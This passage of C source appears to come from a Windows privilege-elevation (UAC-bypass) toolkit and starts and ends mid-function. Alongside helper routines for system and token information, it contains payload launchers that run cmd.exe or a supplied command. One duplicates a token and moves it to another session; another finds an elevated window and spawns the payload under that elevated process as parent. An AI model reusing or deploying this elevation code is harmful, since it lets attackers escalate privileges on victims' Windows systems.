(LPBYTE)ProcessParameters->RuntimeData.Buffer;\n\n    if (lpStartupInfo->dwFlags & (STARTF_USESTDHANDLES | STARTF_USEHOTKEY)) {\n        lpStartupInfo->hStdInput = ProcessParameters->StandardInput;\n        lpStartupInfo->hStdOutput = ProcessParameters->StandardOutput;\n        lpStartupInfo->hStdError = ProcessParameters->StandardError;\n    }\n}\n\n/*\n* ucmExpandEnvironmentStrings\n*\n* Purpose:\n*\n* Reimplemented ExpandEnvironmentStrings.\n*\n*/\nDWORD ucmExpandEnvironmentStrings(\n    _In_ LPCWSTR lpSrc,\n    _Out_writes_to_opt_(nSize, return) LPWSTR lpDst,\n    _In_ DWORD nSize\n)\n{\n    NTSTATUS Status;\n    SIZE_T SrcLength = 0, ReturnLength = 0, DstLength = (SIZE_T)nSize;\n\n    if (lpSrc) {\n        SrcLength = _strlen(lpSrc);\n    }\n\n    Status = RtlExpandEnvironmentStrings(\n        NULL,\n        (PWSTR)lpSrc,\n        SrcLength,\n        (PWSTR)lpDst,\n        DstLength,\n        &ReturnLength);\n\n    if ((NT_SUCCESS(Status)) || (Status == STATUS_BUFFER_TOO_SMALL)) {\n\n        if (ReturnLength <= MAXDWORD32)\n            return (DWORD)ReturnLength;\n\n        Status = STATUS_UNSUCCESSFUL;\n    }\n    RtlSetLastWin32Error(RtlNtStatusToDosError(Status));\n    return 0;\n}\n\n#define SI_MAX_BUFFER_LENGTH (512 * 1024 * 1024)\n\n/*\n* ucmGetSystemInfo\n*\n* Purpose:\n*\n* Returns buffer with system information by given InfoClass.\n*\n* Returned buffer must be freed with HeapFree after usage.\n*\n*/\nPVOID ucmGetSystemInfo(\n    _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass\n)\n{\n    PVOID       buffer = NULL;\n    ULONG       bufferSize = PAGE_SIZE;\n    NTSTATUS    ntStatus;\n    ULONG       returnedLength = 0;\n\n    buffer = ucmxHeapAlloc((SIZE_T)bufferSize);\n    if (buffer == NULL)\n        return NULL;\n\n    while ((ntStatus = NtQuerySystemInformation(\n        SystemInformationClass,\n        buffer,\n        bufferSize,\n        &returnedLength)) == STATUS_INFO_LENGTH_MISMATCH)\n    {\n        ucmxHeapFree(buffer);\n        
bufferSize *= 2;\n\n        if (bufferSize > SI_MAX_BUFFER_LENGTH)\n            return NULL;\n\n        buffer = ucmxHeapAlloc((SIZE_T)bufferSize);\n        if (buffer == NULL)\n            return NULL;\n    }\n\n    if (NT_SUCCESS(ntStatus)) {\n        return buffer;\n    }\n\n    if (buffer)\n        ucmxHeapFree(buffer);\n\n    return NULL;\n}\n\n/*\n* ucmLaunchPayload\n*\n* Purpose:\n*\n* Run payload (by default cmd.exe from system32)\n*\n*/\nBOOL ucmLaunchPayload(\n    _In_opt_ LPWSTR pszPayload,\n    _In_opt_ DWORD cbPayload)\n{\n    BOOL                    bResult = FALSE, bCommandLineAllocated = FALSE;\n    WCHAR                   cmdbuf[MAX_PATH * 2]; //complete process command line\n    WCHAR                   sysdir[MAX_PATH + 1]; //process working directory\n    STARTUPINFO             startupInfo;\n    PROCESS_INFORMATION     processInfo;\n\n    DWORD                   dwCreationFlags = CREATE_NEW_CONSOLE;\n\n    LPWSTR                  lpApplicationName = NULL, lpCommandLine = NULL;\n    SIZE_T                  memIO;\n\n\n    //\n    // Query working directory.\n    //\n    RtlSecureZeroMemory(sysdir, sizeof(sysdir));\n    ucmxQuerySystemDirectory(sysdir, TRUE);\n\n    //\n    // Query startup info from parent.\n    //\n    RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));\n    startupInfo.cb = sizeof(startupInfo);\n    ucmGetStartupInfo(&startupInfo);\n\n    //\n    // Determine what we want to execute, custom parameter or default cmd.exe\n    //\n    if (pszPayload && cbPayload) {\n\n        //\n        // We can use custom payload, copy it to internal buffer.\n        //\n        memIO = PAGE_SIZE + (SIZE_T)cbPayload;\n\n        lpCommandLine = (LPWSTR)ucmxHeapAlloc(memIO);\n\n        if (lpCommandLine) {\n\n            dwCreationFlags = 0;\n            bCommandLineAllocated = TRUE;\n\n            RtlCopyMemory(lpCommandLine,\n                pszPayload,\n                cbPayload);\n\n        }\n    }\n    else {\n\n        //\n        // 
Default cmd.exe should be started.\n        //\n        RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf));\n        _strcpy(cmdbuf, sysdir);\n        _strcat(cmdbuf, L\"cmd.exe\");\n\n        lpApplicationName = cmdbuf;\n        lpCommandLine = NULL;\n        bCommandLineAllocated = FALSE;\n    }\n\n    startupInfo.dwFlags = STARTF_USESHOWWINDOW;\n    startupInfo.wShowWindow = SW_SHOW;\n\n    RtlSecureZeroMemory(&processInfo, sizeof(processInfo));\n\n#ifdef _TRACE_CALL\n    OutputDebugString(L\"CreateProcessAsUser\\r\\n\");\n#endif\n\n    //\n    // Launch payload.\n    //\n    bResult = CreateProcessAsUser(NULL,\n        lpApplicationName,\n        lpCommandLine,\n        NULL,\n        NULL,\n        FALSE,\n        dwCreationFlags,\n        NULL,\n        sysdir,\n        &startupInfo,\n        &processInfo);\n\n    if (bResult) {\n        //\n        // We don't need these handles, close them.\n        //\n        NtClose(processInfo.hProcess);\n        NtClose(processInfo.hThread);\n    }\n\n    //\n    // Post execution cleanup if required.\n    //\n    if (bCommandLineAllocated)\n        ucmxHeapFree(lpCommandLine);\n\n    return bResult;\n}\n\n/*\n* ucmLaunchPayloadEx\n*\n* Purpose:\n*\n* Run payload (by default cmd.exe from system32)\n*\n*/\nBOOL ucmLaunchPayloadEx(\n    _In_ PFNCREATEPROCESSW pCreateProcess,\n    _In_opt_ LPWSTR pszPayload,\n    _In_opt_ DWORD cbPayload)\n{\n    BOOL                    bResult = FALSE, bCommandLineAllocated = FALSE;\n    WCHAR                   cmdbuf[MAX_PATH * 2]; //complete process command line\n    WCHAR                   sysdir[MAX_PATH + 1]; //process working directory\n    STARTUPINFO             startupInfo;\n    PROCESS_INFORMATION     processInfo;\n\n    DWORD                   dwCreationFlags = CREATE_NEW_CONSOLE;\n\n    LPWSTR                  lpApplicationName = NULL, lpCommandLine = NULL;\n    SIZE_T                  memIO;\n\n    if (pCreateProcess == NULL)\n        return bResult;\n\n    //\n    // Query working 
directory.\n    //\n    RtlSecureZeroMemory(sysdir, sizeof(sysdir));\n    ucmxQuerySystemDirectory(sysdir, TRUE);\n\n    //\n    // Query startup info from parent.\n    //\n    RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));\n    startupInfo.cb = sizeof(startupInfo);\n    ucmGetStartupInfo(&startupInfo);\n\n    //\n    // Determine what we want to execute, custom parameter or default cmd.exe\n    //\n    if (pszPayload && cbPayload) {\n\n        //\n        // We can use custom payload, copy it to internal buffer.\n        //\n        memIO = PAGE_SIZE + (SIZE_T)cbPayload;\n\n        lpCommandLine = (LPWSTR)ucmxHeapAlloc(memIO);\n\n        if (lpCommandLine) {\n\n            dwCreationFlags = 0;\n            bCommandLineAllocated = TRUE;\n\n            RtlCopyMemory(lpCommandLine,\n                pszPayload,\n                cbPayload);\n\n        }\n    }\n    else {\n\n        //\n        // Default cmd.exe should be started.\n        //\n        RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf));\n        _strcpy(cmdbuf, sysdir);\n        _strcat(cmdbuf, L\"cmd.exe\");\n\n        lpApplicationName = cmdbuf;\n        lpCommandLine = NULL;\n        bCommandLineAllocated = FALSE;\n    }\n\n    startupInfo.dwFlags = STARTF_USESHOWWINDOW;\n    startupInfo.wShowWindow = SW_SHOW;\n\n    RtlSecureZeroMemory(&processInfo, sizeof(processInfo));\n\n    //\n    // Launch payload.\n    //\n    bResult = pCreateProcess(\n        lpApplicationName,\n        lpCommandLine,\n        NULL,\n        NULL,\n        FALSE,\n        dwCreationFlags,\n        NULL,\n        sysdir,\n        &startupInfo,\n        &processInfo);\n\n    if (bResult) {\n        //\n        // We don't need these handles, close them.\n        //\n        NtClose(processInfo.hProcess);\n        NtClose(processInfo.hThread);\n    }\n\n    //\n    // Post execution cleanup if required.\n    //\n    if (bCommandLineAllocated)\n        ucmxHeapFree(lpCommandLine);\n\n    return bResult;\n}\n\n/*\n* 
ucmLaunchPayload2\n*\n* Purpose:\n*\n* Run payload (by default cmd.exe from system32)\n*\n*/\nBOOL ucmLaunchPayload2(\n    _In_ PFNCREATEPROCESSASUSERW pCreateProcessAsUser,\n    _In_ BOOL bIsLocalSystem,\n    _In_ ULONG SessionId,\n    _In_opt_ LPWSTR pszPayload,\n    _In_opt_ DWORD cbPayload)\n{\n    BOOL                        bResult = FALSE, bCommandLineAllocated = FALSE, bSrvExec = FALSE;\n    WCHAR                       cmdbuf[MAX_PATH * 2]; //complete process command line\n    WCHAR                       sysdir[MAX_PATH + 1]; //process working directory\n    STARTUPINFO                 startupInfo;\n    PROCESS_INFORMATION         processInfo;\n\n    DWORD                       dwCreationFlags = CREATE_NEW_CONSOLE;\n\n    LPWSTR                      lpApplicationName = NULL, lpCommandLine = NULL;\n    SIZE_T                      memIO;\n\n    NTSTATUS                    status;\n    HANDLE                      hToken = NULL, hDupToken = NULL;\n    SECURITY_QUALITY_OF_SERVICE sqos;\n    OBJECT_ATTRIBUTES           obja;\n\n    ULONG                       CurrentSessionId = NtCurrentPeb()->SessionId;\n\n#ifdef _TRACE_CALL\n    WCHAR                       szDebugBuf[1000];\n#endif //_TRACE_CALL\n\n    do {\n\n        bSrvExec = ((bIsLocalSystem) && (CurrentSessionId != SessionId));\n\n#ifdef _TRACE_CALL\n        if (bSrvExec)\n            OutputDebugString(L\"bServExec\");\n#endif //_TRACE_CALL\n\n        //\n        // In case of service start, prepare token for CreateProcessAsUser.\n        // Set token session id, to do this we need SE_TCB_PRIVILEGE, check it enabled.\n        //\n        if (bSrvExec) {\n\n            status = NtOpenProcessToken(\n                NtCurrentProcess(),\n                TOKEN_ALL_ACCESS,\n                &hToken);\n\n            if (!NT_SUCCESS(status)) {\n#ifdef _TRACE_CALL\n                _strcpy(szDebugBuf, L\"NtOpenProcessToken = 0x\");\n                ultohex(status, _strend(szDebugBuf));\n                
_strcat(szDebugBuf, L\"\\r\\n\");\n                OutputDebugString(szDebugBuf);\n#endif  //_TRACE_CALL\n                break;\n            }\n\n#ifdef _TRACE_CALL\n            if (!ucmPrivilegeEnabled(hToken, SE_ASSIGNPRIMARYTOKEN_PRIVILEGE)) {\n                OutputDebugString(L\"ucmPrivilegeEnabled->SE_ASSIGNPRIMARYTOKEN_PRIVILEGE not set\\r\\n\");\n            }\n#endif //_TRACE_CALL\n\n            if (!ucmPrivilegeEnabled(hToken, SE_TCB_PRIVILEGE)) {\n#ifdef _TRACE_CALL\n                OutputDebugString(L\"ucmPrivilegeEnabled->SE_TCB_PRIVILEGE not set\\r\\n\");\n#endif //_TRACE_CALL\n                break;\n            }\n\n            sqos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);\n            sqos.ImpersonationLevel = SecurityImpersonation;\n            sqos.ContextTrackingMode = 0;\n            sqos.EffectiveOnly = FALSE;\n            InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);\n            obja.SecurityQualityOfService = &sqos;\n\n            status = NtDuplicateToken(\n                hToken,\n                TOKEN_ALL_ACCESS,\n                &obja,\n                FALSE,\n                TokenPrimary,\n                &hDupToken);\n\n            if (!NT_SUCCESS(status)) {\n#ifdef _TRACE_CALL\n                _strcpy(szDebugBuf, L\"NtDuplicateToken = 0x\");\n                ultohex(status, _strend(szDebugBuf));\n                _strcat(szDebugBuf, L\"\\r\\n\");\n                OutputDebugString(szDebugBuf);\n#endif //_TRACE_CALL\n                break;\n            }\n\n            status = NtSetInformationToken(\n                hDupToken,\n                TokenSessionId,\n                (PVOID)&SessionId,\n                sizeof(ULONG));\n\n            if (!NT_SUCCESS(status)) {\n#ifdef _TRACE_CALL\n                _strcpy(szDebugBuf, L\"NtSetInformationToken = 0x\");\n                ultohex(status, _strend(szDebugBuf));\n                _strcat(szDebugBuf, L\"\\r\\n\");\n                OutputDebugString(szDebugBuf);\n#endif 
//_TRACE_CALL\n                break;\n            }\n\n        }\n        else {\n            //\n            // Not a service start, use default token value.\n            //\n            hDupToken = NULL;\n        }\n\n        //\n        // Query working directory.\n        //\n        RtlSecureZeroMemory(sysdir, sizeof(sysdir));\n        ucmxQuerySystemDirectory(sysdir, FALSE);\n\n#ifdef _TRACE_CALL\n        OutputDebugString(sysdir);\n#endif //_TRACE_CALL\n\n        //\n        // Query startup info from parent.\n        //\n        RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));\n        startupInfo.cb = sizeof(startupInfo);\n        ucmGetStartupInfo(&startupInfo);\n\n        //\n        // Determine what we want to execute, custom parameter or default cmd.exe\n        //\n        if (pszPayload && cbPayload) {\n\n            //\n            // We can use custom payload, copy it to internal buffer.\n            //\n            memIO = PAGE_SIZE + (SIZE_T)cbPayload;\n\n            lpCommandLine = (LPWSTR)ucmxHeapAlloc(memIO);\n\n            if (lpCommandLine) {\n\n                dwCreationFlags = 0;\n                bCommandLineAllocated = TRUE;\n\n                RtlCopyMemory(lpCommandLine,\n                    pszPayload,\n                    cbPayload);\n\n            }\n        }\n        else {\n\n            //\n            // Default cmd.exe should be started.\n            //\n            RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf));\n            _strcpy(cmdbuf, sysdir);\n            _strcat(cmdbuf, L\"cmd.exe\");\n\n            lpApplicationName = cmdbuf;\n            lpCommandLine = NULL;\n            bCommandLineAllocated = FALSE;\n        }\n\n        startupInfo.dwFlags = STARTF_USESHOWWINDOW;\n        startupInfo.wShowWindow = SW_SHOW;\n\n        RtlSecureZeroMemory(&processInfo, sizeof(processInfo));\n\n        //\n        // In case of start from service, force default WinStation and Desktop.\n        //\n        // Future note: maybe 
moved to registry settings as custom winsta param.\n        //\n        if (bSrvExec) {\n            startupInfo.lpDesktop = TEXT(\"Winsta0\\\\Default\");\n        }\n\n        //\n        // Launch payload.\n        //\n        bResult = pCreateProcessAsUser(\n            hDupToken,\n            lpApplicationName,\n            lpCommandLine,\n            NULL,\n            NULL,\n            FALSE,\n            dwCreationFlags,\n            NULL,\n            sysdir,\n            &startupInfo,\n            &processInfo);\n\n        if (bResult) {\n#ifdef _TRACE_CALL\n            OutputDebugString(L\"CreateProcessAsUser success\\r\\n\");\n#endif //_TRACE_CALL\n            //\n            // We don't need these handles, close them.\n            //\n            NtClose(processInfo.hProcess);\n            NtClose(processInfo.hThread);\n        }\n#ifdef _TRACE_CALL\n        else {\n            _strcpy(szDebugBuf, L\"CreateProcessAsUser failed with code = 0x\");\n            ultohex(GetLastError(), _strend(szDebugBuf));\n            _strcat(szDebugBuf, L\"\\r\\n\");\n            OutputDebugString(szDebugBuf);\n        }\n\n#endif //_TRACE_CALL\n    } while (FALSE);\n\n    //\n    // Post execution cleanup if required.\n    //\n    if (bCommandLineAllocated)\n        ucmxHeapFree(lpCommandLine);\n\n    if (bSrvExec) {\n        if (hToken)\n            NtClose(hToken);\n        if (hDupToken)\n            NtClose(hDupToken);\n    }\n\n    return bResult;\n}\n\n/*\n* ucmLaunchPayload3\n*\n* Purpose:\n*\n* Run payload (by default cmd.exe from system32)\n*\n*/\nBOOL ucmLaunchPayload3(\n    _In_opt_ LPWSTR pszPayload,\n    _In_opt_ DWORD cbPayload)\n{\n    BOOL bResult = FALSE, bCommandLineAllocated = FALSE;\n    ULONG i;\n    HWND hwnd;\n    HANDLE hProcess;\n    LPWSTR lpCommandLine = NULL;\n    SIZE_T memIO;\n    OPLOCK_FILE_CONTEXT ofc;\n    PROCESS_INFORMATION pi;\n\n    WCHAR cmdbuf[MAX_PATH * 2]; //complete process command line\n    WCHAR sysdir[MAX_PATH + 1]; 
//process working directory\n\n    if (ucmCheckUIAccessPermissions()) {\n\n        //\n        // Determine what we want to execute, custom parameter or default cmd.exe\n        //\n        if (pszPayload && cbPayload) {\n\n            //\n            // We can use custom payload, copy it to internal buffer.\n            //\n            memIO = PAGE_SIZE + (SIZE_T)cbPayload;\n\n            lpCommandLine = (LPWSTR)ucmxHeapAlloc(memIO);\n\n            if (lpCommandLine) {\n\n                bCommandLineAllocated = TRUE;\n\n                RtlCopyMemory(lpCommandLine,\n                    pszPayload,\n                    cbPayload);\n\n            }\n        }\n        else {\n\n            //\n            // Default cmd.exe should be started.\n            //\n\n            RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf));\n\n            //\n            // Query working directory.\n            //\n            RtlSecureZeroMemory(sysdir, sizeof(sysdir));\n            ucmxQuerySystemDirectory(sysdir, FALSE);\n\n            _strcpy(cmdbuf, sysdir);\n            _strcat(cmdbuf, L\"cmd.exe\");\n\n            lpCommandLine = cmdbuf;\n            bCommandLineAllocated = FALSE;\n        }\n\n        RtlSecureZeroMemory(&ofc, sizeof(ofc));\n        ofc.Length = sizeof(ofc);\n        ofc.FileHandle = INVALID_HANDLE_VALUE;\n\n        hwnd = ucmFindFirstElevatedWindow();\n        if (!hwnd) {\n            if (ucmStartBackupLockedElevatedProcess(&ofc)) {\n                for (i = 0; i < 5000; i += 500) {\n                    ucmSleep(500);\n                    hwnd = ucmFindFirstElevatedWindow();\n                }\n            }\n        }\n        if (hwnd)\n        {\n            RtlSecureZeroMemory(&pi, sizeof(pi));\n            hProcess = ucmGetHwndFullProcessHandle(hwnd);\n            if (hProcess)\n            {\n                bResult = ucmCreateProcessWithParent(lpCommandLine, hProcess, CREATE_NEW_CONSOLE, SW_SHOW, &pi);\n                if (bResult) {\n                    
CloseHandle(pi.hThread);\n                    CloseHandle(pi.hProcess);\n\n                }\n                CloseHandle(hProcess);\n            }\n        }\n\n        if (ofc.FileHandle != INVALID_HANDLE_VALUE) {\n            ucmReleaseOpLock(&ofc);\n        }\n\n    }\n\n    //\n    // Post execution cleanup if required.\n    //\n    if (bCommandLineAllocated)\n        ucmxHeapFree(lpCommandLine);\n\n    return bResult;\n}\n\n/*\n* ucmQueryRuntimeInfo\n*\n* Purpose:\n*\n* Output current process runtime information.\n*\n*/\nLPWSTR ucmQueryRuntimeInfo(\n    _In_ BOOL ReturnData)\n{\n    BOOL bFound = FALSE;\n    NTSTATUS status;\n    DWORD dwIntegrityLevel;\n    ULONG LengthNeeded = 0;\n    ULONG SessionId = NtCurrentPeb()->SessionId;\n\n    HANDLE hToken = NULL;\n\n    PTOKEN_MANDATORY_LABEL pTIL = NULL;\n    TOKEN_USER* ptu = NULL;\n\n    PROCESS_BASIC_INFORMATION pbi;\n    PROCESS_EXTENDED_BASIC_INFORMATION pebi;\n    PSYSTEM_PROCESS_INFORMATION ProcessList, pList;\n\n    LSA_OBJECT_ATTRIBUTES lobja;\n    LSA_HANDLE PolicyHandle = NULL;\n    PLSA_REFERENCED_DOMAIN_LIST ReferencedDomains = NULL;\n    PLSA_TRANSLATED_NAME Names = NULL;\n    SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;\n\n    LPWSTR lpReport, lpValue = TEXT(\"Unknown\");\n\n    WCHAR szBuffer[MAX_PATH + 1];\n\n    RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));\n    if (GetModuleFileName(NULL, (LPWSTR)&szBuffer, MAX_PATH) == 0)\n        return NULL;\n\n    lpReport = (LPWSTR)ucmxHeapAlloc(2 * PAGE_SIZE);\n    if (lpReport == NULL)\n        return NULL;\n\n    //\n    // 1. Attach module name.\n    //\n    _strncpy(lpReport, MAX_PATH, szBuffer, MAX_PATH);\n\n    //\n    // 2. 
Inherited from.\n    //\n    RtlSecureZeroMemory(&pbi, sizeof(PROCESS_BASIC_INFORMATION));\n    status = NtQueryInformationProcess(\n        NtCurrentProcess(),\n        ProcessBasicInformation,\n        &pbi,\n        sizeof(PROCESS_BASIC_INFORMATION),\n        &LengthNeeded);\n\n    if (NT_SUCCESS(status)) {\n\n        _strcpy(szBuffer, TEXT(\"\\r\\nInherited from PID=\"));\n#ifdef _WIN64\n        u64tostr(pbi.InheritedFromUniqueProcessId, _strend(szBuffer));\n#else \n        ultostr((ULONG)pbi.InheritedFromUniqueProcessId, _strend(szBuffer));\n#endif\n        _strcat(lpReport, szBuffer);\n        _strcat(lpReport, TEXT(\" (\"));\n\n        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n        bFound = FALSE;\n\n        ProcessList = (PSYSTEM_PROCESS_INFORMATION)ucmGetSystemInfo(SystemProcessInformation);\n        if (ProcessList) {\n\n            pList = ProcessList;\n\n            for (;;) {\n\n                if ((ULONG_PTR)pList->UniqueProcessId == pbi.InheritedFromUniqueProcessId) {\n\n                    _strncpy(szBuffer,\n                        MAX_PATH,\n                        pList->ImageName.Buffer,\n                        pList->ImageName.Length / sizeof(WCHAR));\n\n                    bFound = TRUE;\n\n                    break;\n                }\n                if (pList->NextEntryDelta == 0) {\n                    break;\n                }\n                pList = (PSYSTEM_PROCESS_INFORMATION)(((LPBYTE)pList) + pList->NextEntryDelta);\n            }\n            ucmxHeapFree(ProcessList);\n        }\n\n        if (bFound) {\n            _strcat(lpReport, szBuffer);\n        }\n        else {\n            _strcat(lpReport, TEXT(\"Non-existent Process\"));\n        }\n        _strcat(lpReport, TEXT(\")\"));\n\n    }\n\n    //\n    // 3. 
Query various token related data.\n    //\n    //\n    // 3.1 Integrity value.\n    // 3.2 User\\Domain name\n    // 3.3 Session info\n    //\n    status = NtOpenProcessToken(\n        NtCurrentProcess(),\n        TOKEN_QUERY,\n        &hToken);\n\n    if (NT_SUCCESS(status)) {\n\n        LengthNeeded = 0;\n        status = NtQueryInformationToken(\n            hToken,\n            TokenIntegrityLevel,\n            NULL,\n            0,\n            &LengthNeeded);\n\n        if (status == STATUS_BUFFER_TOO_SMALL) {\n\n            pTIL = (PTOKEN_MANDATORY_LABEL)ucmxHeapAlloc(LengthNeeded);\n\n            if (pTIL) {\n\n                status = NtQueryInformationToken(\n                    hToken,\n                    TokenIntegrityLevel,\n                    pTIL,\n                    LengthNeeded,\n                    &LengthNeeded);\n\n                if (NT_SUCCESS(status)) {\n\n                    dwIntegrityLevel = *RtlSubAuthoritySid(pTIL->Label.Sid,\n                        (DWORD)(UCHAR)(*RtlSubAuthorityCountSid(pTIL->Label.Sid) - 1));\n\n                    if (dwIntegrityLevel == SECURITY_MANDATORY_UNTRUSTED_RID) {\n                        lpValue = L\"UntrustedIL\";\n                    }\n                    else if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID) {\n                        lpValue = L\"LowIL\";\n                    }\n                    else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID &&\n                        dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)  //skip SECURITY_MANDATORY_MEDIUM_PLUS_RID\n                    {\n                        lpValue = L\"MediumIL\";\n                    }\n                    else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID &&\n                        dwIntegrityLevel < SECURITY_MANDATORY_SYSTEM_RID)\n                    {\n                        lpValue = L\"HighIL\";\n                    }\n                    else if (dwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID &&\n 
                       dwIntegrityLevel < SECURITY_MANDATORY_PROTECTED_PROCESS_RID)\n                    {\n                        lpValue = L\"SystemIL\";\n                    }\n                    else if (dwIntegrityLevel >= SECURITY_MANDATORY_PROTECTED_PROCESS_RID)\n                    {\n                        lpValue = L\"ProtectedProcessIL\";\n                    }\n\n                    _strcpy(szBuffer, TEXT(\"\\r\\nPID=\"));\n                    ultostr((ULONG)GetCurrentProcessId(), _strend(szBuffer));\n                    _strcat(szBuffer, TEXT(\", \"));\n                    _strncpy(_strend(szBuffer), 40, lpValue, 40);\n                    _strcat(lpReport, szBuffer);\n                }\n                ucmxHeapFree(pTIL);\n            }\n        }\n\n        //\n        // Domain\\User name.\n        //\n        LengthNeeded = 0;\n        status = NtQueryInformationToken(\n            hToken,\n            TokenUser,\n            NULL,\n            0,\n            &LengthNeeded);\n\n        if (status == STATUS_BUFFER_TOO_SMALL) {\n\n            ptu = (PTOKEN_USER)ucmxHeapAlloc(LengthNeeded);\n\n            if (ptu) {\n\n                status = NtQueryInformationToken(\n                    hToken,\n                    TokenUser,\n                    ptu,\n                    LengthNeeded,\n                    &LengthNeeded);\n\n                if (NT_SUCCESS(status)) {\n\n                    SecurityQualityOfService.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);\n                    SecurityQualityOfService.ImpersonationLevel = SecurityImpersonation;\n                    SecurityQualityOfService.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING;\n                    SecurityQualityOfService.EffectiveOnly = FALSE;\n\n                    InitializeObjectAttributes(\n                        &lobja,\n                        NULL,\n                        0L,\n                        NULL,\n                        NULL);\n\n                    
lobja.SecurityQualityOfService = &SecurityQualityOfService;\n\n                    status = LsaOpenPolicy(\n                        NULL,\n                        &lobja,\n                        POLICY_LOOKUP_NAMES,\n                        &PolicyHandle);\n\n                    if (NT_SUCCESS(status)) {\n\n                        status = LsaLookupSids(\n                            PolicyHandle,\n                            1,\n                            &ptu->User.Sid,\n                            &ReferencedDomains,\n                            &Names);\n\n                        if ((NT_SUCCESS(status)) && (status != STATUS_SOME_NOT_MAPPED)) {\n\n                            if (ReferencedDomains != NULL) {\n                                szBuffer[0] = 0;\n\n                                _strncpy(\n                                    szBuffer,\n                                    MAX_PATH,\n                                    ReferencedDomains->Domains[0].Name.Buffer,\n                                    ReferencedDomains->Domains[0].Name.Length / sizeof(WCHAR));\n\n                                _strcat(lpReport, TEXT(\"\\r\\n\"));\n                                _strcat(lpReport, szBuffer);\n                                _strcat(lpReport, TEXT(\"\\\\\"));\n\n                            }\n\n                            if (Names != NULL) {\n                                szBuffer[0] = 0;\n\n                                _strncpy(\n                                    szBuffer,\n                                    MAX_PATH,\n                                    Names->Name.Buffer,\n                                    Names->Name.Length / sizeof(WCHAR));\n\n                                _strcat(lpReport, szBuffer);\n                            }\n                        }\n\n                        if (ReferencedDomains) LsaFreeMemory(ReferencedDomains);\n                        if (Names) LsaFreeMemory(Names);\n\n                        
LsaClose(PolicyHandle);\n                    }\n\n                }\n\n                ucmxHeapFree(ptu);\n            }\n        }\n\n        //\n        // Session info\n        //\n        LengthNeeded = 0;\n        _strcpy(szBuffer, TEXT(\"\\r\\nSessionId=\"));\n        ultostr(SessionId, _strend(szBuffer));\n        _strcat(lpReport, szBuffer);\n\n        _strcat(lpReport, TEXT(\"\\r\\nInteractive Winstation=\"));\n        if (ucmIsUserWinstaInteractive())\n            _strcat(lpReport, TEXT(\"yes\"));\n        else\n            _strcat(lpReport, TEXT(\"no\"));\n\n        NtClose(hToken);\n    }\n\n    //\n    // 4. Wow64\n    //\n    RtlSecureZeroMemory(&pebi, sizeof(pebi));\n    pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION);\n\n    status = NtQueryInformationProcess(\n        NtCurrentProcess(),\n        ProcessBasicInformation,\n        &pebi,\n        sizeof(pebi),\n        NULL);\n\n    if (NT_SUCCESS(status)) {\n        _strcpy(szBuffer, TEXT(\"\\r\\nWOW64 Enabled=\"));\n        ultostr(pebi.IsWow64Process, _strend(szBuffer));\n        _strcat(lpReport, szBuffer);\n    }\n\n    if (ReturnData == FALSE) {\n\n        MessageBox(\n            GetDesktopWindow(),\n            lpReport,\n            GetCommandLine(),\n            MB_ICONINFORMATION);\n\n        ucmxHeapFree(lpReport);\n        lpReport = NULL;\n    }\n\n    return lpReport;\n}\n\n/*\n* ucmDestroyRuntimeInfo\n*\n* Purpose:\n*\n* Release memory allocated by ucmQueryRuntimeInfo if ReturnData flag used.\n*\n*/\nBOOLEAN ucmDestroyRuntimeInfo(\n    _In_ LPWSTR RuntimeInfo)\n{\n    return ucmxHeapFree((PVOID)RuntimeInfo);\n}\n\n/*\n* ucmIsUserWinstaInteractive\n*\n* Purpose:\n*\n* Return TRUE if current user operates on Winstation with visible surfaces, FALSE otherwise.\n*\n*/\nBOOL ucmIsUserWinstaInteractive(\n    VOID\n)\n{\n    BOOL bResult = TRUE;\n    USEROBJECTFLAGS uof;\n    HWINSTA hWinStation;\n\n    //\n    // Open current winstation.\n    //\n    hWinStation = 
GetProcessWindowStation();\n    if (hWinStation) {\n        //\n        // Query winstation flags.\n        //\n        if (GetUserObjectInformation(\n            hWinStation,\n            UOI_FLAGS,\n            &uof,\n            sizeof(USEROBJECTFLAGS),\n            NULL))\n        {\n            //\n            // Does the winstation have visible surfaces?\n            //\n            if ((uof.dwFlags & WSF_VISIBLE) == 0)\n                bResult = FALSE;\n        }\n    }\n    return bResult;\n}\n\n/*\n* ucmIsUserHasInteractiveSid\n*\n* Purpose:\n*\n* pbInteractiveSid will be set to TRUE if current user has interactive sid, FALSE otherwise.\n*\n* Function returns operation status code.\n*\n*/\nNTSTATUS ucmIsUserHasInteractiveSid(\n    _In_ HANDLE hToken,\n    _Out_ PBOOL pbInteractiveSid)\n{\n    BOOL IsInteractiveSid = FALSE;\n    NTSTATUS status = STATUS_UNSUCCESSFUL;\n    ULONG LengthNeeded = 0;\n\n    DWORD i;\n\n    SID_IDENTIFIER_AUTHORITY SidAuth = SECURITY_NT_AUTHORITY;\n    PSID InteractiveSid = NULL;\n    PTOKEN_GROUPS groupInfo = NULL;\n\n    do {\n\n        status = NtQueryInformationToken(\n            hToken,\n            TokenGroups,\n            NULL,\n            0,\n            &LengthNeeded);\n\n        if (status != STATUS_BUFFER_TOO_SMALL)\n            break;\n\n        groupInfo = (PTOKEN_GROUPS)ucmxHeapAlloc(LengthNeeded);\n\n        if (groupInfo == NULL)\n            break;\n\n        status = NtQueryInformationToken(\n            hToken,\n            TokenGroups,\n            groupInfo,\n            LengthNeeded,\n            &LengthNeeded);\n\n        if (!NT_SUCCESS(status))\n            break;\n\n        status = RtlAllocateAndInitializeSid(\n            &SidAuth,\n            1,\n            SECURITY_INTERACTIVE_RID,\n            0, 0, 0, 0, 